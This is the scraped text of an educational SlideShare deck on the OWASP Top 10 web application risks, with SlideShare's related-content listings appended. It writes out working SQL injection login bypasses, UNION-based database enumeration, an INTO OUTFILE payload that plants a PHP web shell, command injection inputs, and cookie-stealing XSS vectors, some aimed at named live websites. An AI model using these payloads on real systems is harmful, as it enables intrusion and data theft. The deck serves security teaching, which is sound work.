SlideShare a Scribd company logo
1 of 137
Download to read offline
 
TOP 10 WEB APPLICATION SECURITY
HAZARDS
@  
by Abhinav Sejpal
Null - Humla Session
THOUGHT WORKS - BANGALORE
 
      WHO AM I
I' m Next-Gen Exploratory Testy 
Student of Information Security field
Researcher & Reader in free time
Member of
Crowd Tester (AKA. Bug bounty Hunter)  
Proficient at Functional, Usability , Accessibility & Compatibility Testing
Love to develop nasty code  & Hack it :)
Works as Quality Analyst at
AKA. Bug Wrangler
Null Open Security Co mmunity
passbrains.com
DISCLAIMER
This presentation is intended for educational purpose only and I cannot be held liable for
any kind of damages done, whatsoever to your machine, or any other damages.  
Don't try this attack on any other system without having context knowledge or permission,
this may harm someone directly or indirectly.
Feel free to use this presentation for practice or education purpose.
^ I hope - You gotcha ^
~ WE AREN'T GOING TO DO THIS ~
So, feel free to stop when you have a doubt!
 Are you Ready to Rock ???
AGENDA
 Why Web Application Security Testing ?
 Myths, you'll hear - but Do you believe ?
 What is OWASP, what do they provide ? 
  OWASP Web Top - 10 Publication
 How web works ?
 Proof of Concept  for Top - 10 attack 
 Self exploratory exercise on Top - 10
 Learn + Hack   
 Q  &  A
   FOR SOCIAL MEDIA
Twitter handle 
 @  @null0x00 Abhinav_Sejpal
Hashtag for this session
     # #Nullhumla nullblr
HUMLA
MEANS 'ATTACK' IN HINDI
                        
 
   
OBJECTIVES FOR THIS SESSION
BUILD SECURITY AWARENESS FOR WEB
APPLICATION
GET TO KNOW ATTACK METHOD OF HACKERS
LEARN WAY TO DISCOVER SECURITY
VULNERABILITIES
LEARN BASIC OF SECURE WEB APPLICATION VIA
OWASP TOP 10
WHY WEB APPLICATION SECURITY TESTING?
HERE IS THE ANSWER !
Increases vulnerability to attacks
Damage to your reputation and brand value
Loss of customer confidence & potential business
Disturbance to your online means of revenue collection
Legal liability
Website downtime, loss of time & resources in mitigating the damage
Additional costs and regression testing associated with securing web
applications for future attacks
And much more! Boom - Isn't it?
The average loss reported in the 2007 CSI Computer Crime and Security
Survey was $350,424.
COMPROMISED SCENARIO
MYTHS, YOU'LL HEAR - BUT DO YOU BELIEVE?
DON'T BELIEVE IN MYTHS!
Secure Socket Layer (SSL / HTTPS) protects my website.
Buy this one tool and it will solve all my problems.
We don’t have anything worth to be stolen.
{Java - Insert Name here} is a secured language.
We can't possibly be a target.
We never had any data breaches on our organization and we are
safe. Our technical team is much smart.  #facepalm
We have a firewall setup (WAF) - Nothing to worry! You wish 
You're safer on a mobile site as compared to a desktop.
Can come up with umpteen more!
SO, DO YOU ALL AGREE  THAT
WEB APPLICATION SECURITY IS
ESSENTIAL?
 
MY OPINION  
SECURITY TESTING IS ALWAYS A RACE BETWEEN HACKERS AND THE
SECURITY COMPANIES TO GET ONE STEP AHEAD OF EACH OTHER.
 RISK MANAGEMENT 
THE WEB WILL NEVER BE 100 PER CENT SECURE, BUT WITH GOOD
DUE DILIGENCE, IT CAN BE ONE OF THE SAFEST PLACES ON EARTH TO
DO BUSINESS. 
AFTER ALL, OUR PRIMARY CONCERN IS SEAMLESS BUSINESS.
There we stand ^ Web application Security Ninja's ^
:D
WHAT IS OWASP?
O verly
Wonderful
Awesome
Super
People !
OWASP -THE OPEN WEB
APPLICATION SECURITY PROJECT
(OWASP) is a 501c3 not for-profit worldwide charitable organization
Everyone is free to participate in OWASP and all the materials are
available under a free and open software license
It provides a free access to community resources and events:
 Publications, Articles 
Standard  Testing and Training Software
 Local Chapters & Mailings List
 World-wide conferences 
OWASP ROLE
Make application security visible, so that people and
organizations can make informed decisions about true
application security risk!
What do we mean by OWASP  Top 10 Web Application
Security Vulnerabilities ?
A list of the 10 most severe security issues f requently occur in
web applications.
It’s a list of vulnerabilities that require immediate remediation.
Existing code should be checked for these vulnerabilities, as these
flaws are effectively targeted by attackers.
New updates on tithe year (third year sequence). 
Strong push to present as a standard
Are we sure that this survey results are trustworthy ?
This wiki is not a standard or a policy. It provides a brief
description of the vulnerabilities, and methods of
This is nothing but
  Top ten web application security hazards
recommended by OWASP Survey.
^ Myth Involved Here^
prevention.
LET'S BEGIN OUR JOURNEY
OF 
TOP 10 WEB APPLICATION SECURITY
HAZARDS
 I don't want to showcase top ten - let's start with baby
steps 
How Web works ?
HTTP HEADER FLOW
 Tamper Google HTTP request!
I have questions?
Does the user input go through any validation at user’s web browser?
Does Business Logic verify the user inputs at server side?
 
If your answer is 'No', then be ready for the 'Nightmare'
Conclusion
Modern websites rely on user input for everything.
They are basically applications which expect various kinds
of inputs coming from users to function a certain way. 
 ~ Courtesy   ~@makash
Could be Command / SQL statement 
I AM THAT BAD INPUT
'INJECTION ' 
OWASP #A1
WHAT IS SQL ?
SQL stands for Structured Query Language.
Execute queries against a database
Retrieve data from a database
Insert new records in a database
Delete records from a database
In short, All DB operations :)
 USER INPUT? AHA
WHAT IF THIS WORKS? UMM
IT'S ME - SQL INJECTION
PEOPLE CALL ME SQLI ALSO
'YES' - I AM A BOTTLENECK FOR DEVELOPERS SINCE MANY YEARS
Smart Geeks opt for me along with user inputs &  perform attack.
               
PREVIOUS ATTACKS VIA SQLI
 SQL injection has been responsible for 83% of all
successful hacking-related data
breaches, from 2005-2011.
(Source: Privacyrights.org)
Automation Infects 100,000s: In 2008,
SQLi attacks became automated via the
use of botnets. Mass website infection
incidents include 500,000 reported in
2008; 210,000 in 2009; 500,000 in 2010 and
380,000 in 2011.
SQLI FACTS
Dominant Source of Attack: 97
percent
of data breaches worldwide are due
to
SQL injection.
(Source: National Fraud Authority UK)
Web Application Risk: SQL Injection was the leading
Web application risk of 2011. It ranks as one
of the most common software vulnerabilities in
survey after survey(Source: Trustwave)
CAKE PHP
Struts 2
Spring 
GWT (Google Web toolkit)
MYTHS
SQLi is old days' problem - I shouldn't worry about this.
^^
I am using Java / PHP / RUBY / ASP modern days'
framework.
ESAPI
Latest SQL Injection Campaign Infects 1 Million Web Pages
Yahoo Hit By SQL Injection Attack
SQL INJECTION FLAW IN WALL STREET
JOURNAL DATABASE LED TO BREACH
SQL INJECTION ISN'T GOING ANY WHERE  <3
for:
Setup the Test Lab
Install XAMPP
Acronym
X (to be read as "cross", meaning )cross-platform
Apache HTTP Server
MySQL
PHP
Perl
TARGETED APPLICATION
Client Side language : HTML & Javascript
Server side Language: PHP
DB : MYSQL 
Why PHP ?  - Any answer Here?
Why MySQL?  MySQL is  Girlfriend of PHP <3 
PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE
PROGRAMMING LANGUAGE.
http://w3techs.com/technologies/overview/programming_lang
PHP: 244M SITES
2.1M IP ADDRESSES
2013 Server-side Programming Language of the Year
Don't Mind Power of PHP > Facebook & yahoo 
http://w3techs.com/blog/entry/web_technologies_of_the_year
ERROR BASED SQLI
Demo
http://sqli.cyberwebdeveloper.com/index.php
CONCEPT
Basic SQL query Login page :-
SELECT * FROM users where username="username" AND
password = "pass"
Basic PHP statement for Login page :-
SELECT * FROM users where username='".$username."' AND
password = '".md5($pass)."'"  
*Md5() method is used to encrypt the password.
       * Demo at SQL *
CHEAT SHEET
#Attack  - 1
SELECT * FROM `users` WHERE `username` ='admin' or
'1'='1' and password ='I dont know'
Injection code :-
admin' or '1'='1
WHY ?
Attack 1 is rely on 'User name'
SELECT * FROM `users` WHERE `username` =' admin' or
'1'='1 ' and password ='I dont know'
Can't perform this attack on password field due to
encryption.
User name = anything' or '1' ='1
password = anything' or '1'='1
* known User name is mandatory Here*
LEARNING FROM THE ATTACK 1
User name is known i.e. 'admin'
 Append SQL statement with user name
 
<It simply works>
But you can't perform this attack without user name
COMMENTS BASED SQLI
http://dev.mysql.com/doc/refman/5.1/en/comments.html
# : Single line comment
"-- " : Sequence to end of line comment
/*  Sequence to following block comment*/
CONCEPT
Basic SQL query Login page :-
SELECT * FROM users where username="username" AND
password = "pass"
What if  - I insert comments in first attack
SELECT * FROM users where username=" admin" or '1' ='1'
# AND password = "pass"
<< AND password = " pass" >> doesn't execute all
IF YOU GET ME - ATTACK DOESN'T
REQUIRE USER NAME NOW
 SELECT * FROM users where username=" admin" or '1' ='1'
# AND password = "pass"
SQL statement will be always true due  '1' = '1'  thus doesn't
matter, you are knowing user name or not.
Yes - I am done. but what if ' #' is not valid input?
(-- ) WORKS FOR YOU BUDDY!
* --(space) is syntax 
admin' or '1' = '1' --: False 
admin' or '1' = '1' --  : True
Mostly people forget to add space, so I use below vector
admin' or '1' = '1' -- space + any one character
E.G. > admin' or '1' = '1' -- Sandy
SO, WHAT DO YOU THINK,
SQL IS ALL ABOUT   1=1? 
ssshhh - Do you hear that? - NO
DUMP SENSITIVE DB INFO
* Identify column gets selected.
* Identify the data set which value will be displayed.
a%' union select 1,2,3,4,5 from users #
a%' union select 1 ,@@datadir,2,3,4 from users #
a%' union select 1 ,@@version,3,4,5 from users #
DATABASE ENUMERATION  
a%' union select 1, table_schema,2,3,4 from
information_schema.tables  #
TABLE ENUMERATION
a%' union select 1, table_schema, table_name,3,4 from
information_schema.tables  #
a%' union select 1, table_schema, table_name,3,4 from
information_schema.tables  where
table_schema='sqlhumla'#
 - Text File Writing
SHELL INJECTION
Into outfile 
I want to save a MySQL query result to a text file like this:
<span class="kwd">SELECT</span>
<span class="pln"></span>
<span class="pun">*</span>
<span class="pln"></span>
<span class="kwd">FROM</span>
<span class="pln"> orders </span>
<span class="kwd">INTO</span>
<span class="pln"> OUTFILE </span>
<span class="str">'/data.txt'</span>
Can we append the same logic with our injection?
user=frodo' into outfile 'test.txt'; -- comments
SHELL INJECTION
'Hello world' PHP File Writing at current folder
=FRODO' INTO OUTFILE "../../HTDOCS/XAMPP/SQLI/TEST.TXT"; - A
Select * from users where username = 'frodo' union select
1,2,3," <?php  echo "Hello World"; ?> ",5 from users into
outfile '../../htdocs/xampp/sqli/ shellTest.php';  -- a
PHP SHELL CODE
<?php $output = shell_exec('Test'); echo
'<pre>$output</pre>'; ?>
Append the same as SQL injection
user=frodo' union select 1,2,3, " <?php $output =
shell_exec('test'); echo '<pre>$output</pre>'; ?>", 5 from
users into outfile '../../htdocs/xampp/sqli/shell.php';  -- a
THERE YOU ARE!
http://127.0.0.1/xampp/Sqli/shell.php?test=dir
   
PLAY GROUND
DAMN VULNERABLE WEB APP
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web
application that is damn vulnerable. Its main goals are to be
an aid for security professionals to test their skills and tools
in a legal environment.
http://www.dvwa.co.uk/
https://github.com/RandomStorm/DVWA
COMMAND INJECTION
127.0.0.1 && DIR
OWASP #A1
UNDERSTAND THE CODE
ANOTHER VECTOR
1 | DIR C:
BAD CODE WITH SUBSTITUTIONS
AUTOMATION
TOOLS / FRAMEWORK FOR POC
Metasploit
SQL MAP
Havij
Sql inject Me(add-on)
Burp suit 
SQL Inject  or many....!
XXS
CROSS-SITE SCRIPTING
"XSS enables attackers to inject client-side
script into web pages viewed by other users".
OWASP #A3
Wikipedia says
WHAT IS XSS ?
http://appsandsecurity.blogsplot.de/2012/11/is-xss-solved.html
OWASP says "Cross-Site Scripting (XSS) attacks are a type of
injection, in which malicious scripts are injected into
otherwise benign and trusted web sites.
https://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29
SO WHERE DOES XSS STAND?
ACCORDING TO WHITE HAT,  53% WEB APPLICATIONS HAVE XSS
VULNERABILITY. 
https://www.whitehatsec.com/assets/WPstatsReport_052013.p
DO YOU KNOW,
81 OUT OF 100 POPULAR MOBILE
WEBSITES ARE VULNERABLE TO
XSS?
http://www.nds.rub.de/media/nds/veroeffentlichungen/2013/08
STATS FROM GOOGLE'S
VULNERABILITY REWARD PROGRAM
http://www.nilsjuenemann.de/2012/12/news-about-
googles-vulnerability-reward.html
INPUT - OUTPUT CONTEXT
http://slides.com/mscasharjaved/on-breaking-php-based-cross-site-scripting-protections-in-the-wild#/61
http://slides.com/mscasharjaved/on-breaking-php-based-cross-site-scripting-protections-in-the-wild#/63
LIFE CYCLE OF REFLECTED XSS
AND I'M YOUR XSS!
</script> <script> confirm(1); </script>
LIVE
http://tvfortesters.com/?s="><script>
alert(document.cookie); </script>
   I f you get me, it is Reflected XSS
Challenge #1
http://demo.testfire.net/
Copyright © 2014, IBM Corporation
(AKA NON-PERSISTENT)REFLECTED XSS
Reflected XSS occurs when user input is immediately
returned by a web application in an error message, search
result, or any other response that includes some or all of the
input provided by the user as part of the request, without
that data being made safe to render in the browser, and
without permanently storing the user provided data.
https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting
CAN WE SAVE JS CODE IN DB?
What if so ? :D
     
LIFE CYCLE OF STORED XSS
 I T IS STORED XSS
Live 
http://mmqb.si.com/2014/08/20/san-francisco-49ers-new-stadium-training-camp-thoughts-
peter-king-video/#mmqb_livefyre_comm_bellow/autostart/
Vector :  Under BIO :- </p></script> <img src=1
onerror=alert(document.cookie);>
STORED XSS
Stored XSS generally occurs when user input is stored on the
target server, such as in a database, in a message forum,
visitor log, comment field, etc. And then a victim is able to
retrieve the stored data from the web application.
#XSS WRITE-UP BY ASHAR
http://www.scribd.com/doc/210121412/XSS-is-not-going-
anywhere
OH NO, THERE IS AN XSS IN YOUR JS
http://127.0.0.1/xampp/DOM%20XSS/domxss_demo_1.html#
<img src=nonexistent onerror=alert(1)>
IT'S DOM BASED XSS
Directory Object Model
Understand the Logic
When Source gets synced? 
 
An attacker may append a JS to the affected page URL
which would, when executed, display the alert box.
Impact would show only on - Client side JS
 IF YOU WANT TO KNOW MORE
ABOUT DOM BASED XSS THEN 
PLEASE BUG " "@LAVAKUMARK
More Info at : https://ironwasp.org/
<shhh - Very low priority but should be acknowledged >
NO MORE TALK ABOUT SELF XSS
But there is a lot to learn :D
Am I Vulnerable To 'Broken Authentication   &
Session Management'?
A2 - OWASP TOP 10
So, Let's Learn about Web App DB structure
Passwords are stored in plain text.
oh really  -- ':(
OWASP #A6
Password is protected, when stored using encryption
algorithm.   Are you sure? 
http://www.md5online.org/
YOU MAY ALSO TRY OUT HASH BUT PASSWORD SALT IS A
RECOMMENDED SOLUTION SO FAR.
P ASSWORD POLICY SHOULD BE APPLIED NICELY AND SHOULD NOT BE WEAKER.
-- * --
SECURITY & BUSINESS LOGIC SHOULD BE APPLIED FOR CHANGING PASSWORD.  CHANGE
PASSWORD DOESN'T ASK FOR CURRENT PASSWORD - LOL 
IN-SECURED SESSION-ID
Cookies Flag HTTP ONLY 
Secure flag would be complimentary 
TAKE AWAY 
AVOIDING INSECURE DIRECT OBJECT REFERENCES
OWASP #A4  
 URLS' PATTERN
Demo  #1
Tamper the ID parameter
http://127.0.0.1/xampp/sqli/secondorder_changepass.php
ENUMERATION USING PARAMETER
LIVE
https://profile.utest.com/67797
https://profile.utest.com/200 -- N
MISSING FUNCTION LEVEL ACCESS CONTROL
OWASP #A7
CONCEPT 
LIVE
HTTP://STEPINFORUM.ORG/MAILERS2014/
http://demo.testfire.net/pr/
Source: https://www.aspectsecurity.com/uploads/downloads/2012/03/Aspect-Security-The-Unfortunate-Reality-of-Insecure-
Libraries.pdf
USING KNOWN VULNERABLE
COMPONENTS 
OWASP #A9
~ PROTECTION AGAINST ~
A6 – Sensitive Data Exposure
BASIC UNDERSTANDING
HTTP://SLIDES.COM/ABHINAVSEJPAL/TOP-10-WEB-APPLICATION-SECURITY-HAZARDS#/89
OWASP #A8 – Avoiding CSRF Flaws
CSRF 
CSRF DEMO
UNDERSTAND CSRF FIX
SECURITY
MISCONFIGURATION
OWASP -#A5 
           if you are planning to host your own server 
this talk matters for you 
"SECURING A LINUX WEB SERVER IN 10 STEP S"
BY   A KASH MAHAJAN 
https://www.youtube.com/watch?v=ort9qxzu3h0
YES - I'M DONE!
Feel free to write me at bug.wrangler at outlook.com
GOOD READS
https://www.owasp.org/
http://ha.ckers.org
http://hakipedia.com
http://www.fiddlerontheroot.com
http://www.garage4hackers.com
http://www.computersecuritystudent.com/
-- Explore Google Darling > Search  'OWASP  TOP Ten' --
WE NEED YOU!
Attend Null Meets-up & give presentations.
Share your ideas & leanings.
Talk to our community champions & gain from leanings.
Your feedback helps us to build a good community.
Looking forward to your ongoing support.
HTTP://NULL.CO.IN/
Say 'Hello' @null0x00
- Twitter Folks -
@ , @ , @
@ , @ , @
    @ ,
 #Nullblr Leads & Champions
Big thank you to @ ,@   & you All.
CREDITS
riyazwalikar anantshri makash
TroyHunt yog3sharma soaj1664ashar
@ MohammedAImran ru94mb
@ LAVAKUMARK , @1_NEHA
null0x00 JubbaOnJeans
THANK YOU! 
KEEP THE SECURITY ANTE UP.
https://slides.com/abhinavsejpal/top-10-web-application-
security-hazards 
LICENSE AND COPYRIGHTS
Copyrights 2013-2014 Abhinav Sejpal
-----
  ( CC BY-NC-ND 3.0)
Attribution-NonCommercial-NoDerivs 3.0 Unported
 Dedicated to my lovely daddy

More Related Content

What's hot

Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application SecurityRob Ragan
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHPjikbal
 
Web application security
Web application securityWeb application security
Web application securityKapil Sharma
 
3. backup file artifacts - mazin ahmed
3. backup file artifacts - mazin ahmed3. backup file artifacts - mazin ahmed
3. backup file artifacts - mazin ahmedRashid Khatmey
 
Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Aaron Hnatiw
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAjin Abraham
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksAll Things Open
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Aaron Hnatiw
 
.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security TopicsShawn Gorrell
 
Web application Security tools
Web application Security toolsWeb application Security tools
Web application Security toolsNico Penaredondo
 
How to secure web applications
How to secure web applicationsHow to secure web applications
How to secure web applicationsMohammed A. Imran
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In PhpAkash Mahajan
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Jim Manico
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhibhumika2108
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesMohammed A. Imran
 

What's hot (20)

Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Web Application Security with PHP
Web Application Security with PHPWeb Application Security with PHP
Web Application Security with PHP
 
t r
t rt r
t r
 
Web application security
Web application securityWeb application security
Web application security
 
3. backup file artifacts - mazin ahmed
3. backup file artifacts - mazin ahmed3. backup file artifacts - mazin ahmed
3. backup file artifacts - mazin ahmed
 
OWASP API Security TOP 10 - 2019
OWASP API Security TOP 10 - 2019OWASP API Security TOP 10 - 2019
OWASP API Security TOP 10 - 2019
 
Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017Beyond OWASP Top 10 - Hack In Paris 2017
Beyond OWASP Top 10 - Hack In Paris 2017
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
2 . web app s canners
2 . web app s canners2 . web app s canners
2 . web app s canners
 
Abusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox AddonsAbusing Exploiting and Pwning with Firefox Addons
Abusing Exploiting and Pwning with Firefox Addons
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security RisksOWASP Top 10 - The Ten Most Critical Web Application Security Risks
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
 
Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017Beyond OWASP Top 10 - TASK October 2017
Beyond OWASP Top 10 - TASK October 2017
 
.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security Topics
 
Web application Security tools
Web application Security toolsWeb application Security tools
Web application Security tools
 
Owasp Top 10-2013
Owasp Top 10-2013Owasp Top 10-2013
Owasp Top 10-2013
 
How to secure web applications
How to secure web applicationsHow to secure web applications
How to secure web applications
 
Secure Programming In Php
Secure Programming In PhpSecure Programming In Php
Secure Programming In Php
 
Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5Top Ten Proactive Web Security Controls v5
Top Ten Proactive Web Security Controls v5
 
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan GandhiReliable and fast security audits - The modern and offensive way-Mohan Gandhi
Reliable and fast security audits - The modern and offensive way-Mohan Gandhi
 
How to find Zero day vulnerabilities
How to find Zero day vulnerabilitiesHow to find Zero day vulnerabilities
How to find Zero day vulnerabilities
 

Viewers also liked

Android mobile app security offensive security workshop
Android mobile app security   offensive security workshopAndroid mobile app security   offensive security workshop
Android mobile app security offensive security workshopAbhinav Sejpal
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!Bernardo Damele A. G.
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesSoftware Guru
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)Bernardo Damele A. G.
 
What is SAP| SAP Introduction | Overview of SAP
What is SAP| SAP Introduction | Overview of SAPWhat is SAP| SAP Introduction | Overview of SAP
What is SAP| SAP Introduction | Overview of SAPGlobustrainings
 
Sheepskin Flurries
Sheepskin FlurriesSheepskin Flurries
Sheepskin FlurriesPaul M
 
A critical review of performance evaluation tools and technique
A critical review of performance evaluation tools and techniqueA critical review of performance evaluation tools and technique
A critical review of performance evaluation tools and techniquetanjim11
 
The Saudi oil war against Russia, Iran and the US
The Saudi oil war against Russia, Iran and the USThe Saudi oil war against Russia, Iran and the US
The Saudi oil war against Russia, Iran and the USFrancesco Legname
 
Powerpoint presentation
Powerpoint presentationPowerpoint presentation
Powerpoint presentationMargurit
 

Viewers also liked (13)

Android mobile app security offensive security workshop
Android mobile app security   offensive security workshopAndroid mobile app security   offensive security workshop
Android mobile app security offensive security workshop
 
Got database access? Own the network!
Got database access? Own the network!Got database access? Own the network!
Got database access? Own the network!
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Hacking Shared Hosting with Symlink
Hacking Shared Hosting with SymlinkHacking Shared Hosting with Symlink
Hacking Shared Hosting with Symlink
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)SQL injection: Not Only AND 1=1 (updated)
SQL injection: Not Only AND 1=1 (updated)
 
What is SAP| SAP Introduction | Overview of SAP
What is SAP| SAP Introduction | Overview of SAPWhat is SAP| SAP Introduction | Overview of SAP
What is SAP| SAP Introduction | Overview of SAP
 
SAP Basics
SAP BasicsSAP Basics
SAP Basics
 
Sheepskin Flurries
Sheepskin FlurriesSheepskin Flurries
Sheepskin Flurries
 
A critical review of performance evaluation tools and technique
A critical review of performance evaluation tools and techniqueA critical review of performance evaluation tools and technique
A critical review of performance evaluation tools and technique
 
The Saudi oil war against Russia, Iran and the US
The Saudi oil war against Russia, Iran and the USThe Saudi oil war against Russia, Iran and the US
The Saudi oil war against Russia, Iran and the US
 
Powerpoint presentation
Powerpoint presentationPowerpoint presentation
Powerpoint presentation
 

Similar to Owasp top 10 web application security hazards - Part 1

Oh no, was that CSRF #Ouch
Oh no, was that CSRF #Ouch Oh no, was that CSRF #Ouch
Oh no, was that CSRF #Ouch Abhinav Sejpal
 
[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+CsrfBipin Upadhyay
 
Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Ravindra Singh Rathore
 
香港六合彩
香港六合彩香港六合彩
香港六合彩baoyin
 
Break it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareBreak it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareLeigh Honeywell
 
Security testing for web developers
Security testing for web developersSecurity testing for web developers
Security testing for web developersmatthewhughes
 
Security as a New Metric for Your Business, Product and Development Lifecycle...
Security as a New Metric for Your Business, Product and Development Lifecycle...Security as a New Metric for Your Business, Product and Development Lifecycle...
Security as a New Metric for Your Business, Product and Development Lifecycle...IT Arena
 
Security as a new metric for Business, Product and Development Lifecycle
Security as a new metric for Business, Product and Development LifecycleSecurity as a new metric for Business, Product and Development Lifecycle
Security as a new metric for Business, Product and Development LifecycleNazar Tymoshyk, CEH, Ph.D.
 
Get Ready for Web Application Security Testing
Get Ready for Web Application Security TestingGet Ready for Web Application Security Testing
Get Ready for Web Application Security TestingAlan Kan
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 
Application Layer Firewalls
Application Layer FirewallsApplication Layer Firewalls
Application Layer FirewallsSaumil Shah
 
Java Application Development Vulnerabilities
Java Application Development VulnerabilitiesJava Application Development Vulnerabilities
Java Application Development VulnerabilitiesNarola Infotech
 
Developing Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common AttacksDeveloping Secure Applications and Defending Against Common Attacks
Developing Secure Applications and Defending Against Common AttacksPayPalX Developer Network
 
Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Cyber Security Workshop @SPIT- 3rd October 2015
Cyber Security Workshop @SPIT- 3rd October 2015Nilesh Sapariya
 
OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE OWASP Top 10 2007 for JavaEE
OWASP Top 10 2007 for JavaEE Magno Logan
 
Cyber crime an eye opener 144 te 2 t-7
Cyber crime an eye opener  144 te 2 t-7Cyber crime an eye opener  144 te 2 t-7
Cyber crime an eye opener 144 te 2 t-7Gargee Hiray
 
Application Security on a Dime: A Practical Guide to Using Functional Open So...
Application Security on a Dime: A Practical Guide to Using Functional Open So...Application Security on a Dime: A Practical Guide to Using Functional Open So...
Application Security on a Dime: A Practical Guide to Using Functional Open So...POSSCON
 

Similar to Owasp top 10 web application security hazards - Part 1 (20)

Oh no, was that CSRF #Ouch
Oh no, was that CSRF #Ouch Oh no, was that CSRF #Ouch
Oh no, was that CSRF #Ouch
 
[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf
 
Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)Sql injections (Basic bypass authentication)
Sql injections (Basic bypass authentication)
 
OWASP Top10 2010
OWASP Top10 2010OWASP Top10 2010
OWASP Top10 2010
 
OWASP an Introduction
OWASP an Introduction OWASP an Introduction
OWASP an Introduction
 
Project Presentation
Project Presentation Project Presentation
Project Presentation
 
香港六合彩
香港六合彩香港六合彩
香港六合彩
 
Break it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure softwareBreak it while you make it: writing (more) secure software
Break it while you make it: writing (more) secure software
 
Security testing for web developers
Security testing for web developersSecurity testing for web developers
Security testing for web developers
 
Security as a New Metric for Your Business, Product and Development Lifecycle...
Security as a New Metric for Your Business, Product and Development Lifecycle...Security as a New Metric for Your Business, Product and Development Lifecycle...
Security as a New Metric for Your Business, Product and Development Lifecycle...
 
Security as a new metric for Business, Product and Development Lifecycle
Security as a new metric for Business, Product and Development LifecycleSecurity as a new metric for Business, Product and Development Lifecycle
Security as a new metric for Business, Product and Development Lifecycle
 
Get Ready for Web Application Security Testing
Get Ready for Web Application Security TestingGet Ready for Web Application Security Testing
Get Ready for Web Application Security Testing
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
 
Application Layer Firewalls
Application Layer FirewallsApplication Layer Firewalls
Application Layer Firewalls
 
Java Application Development Vulnerabilities
Java Application Development VulnerabilitiesJava Application Development Vulnerabilities
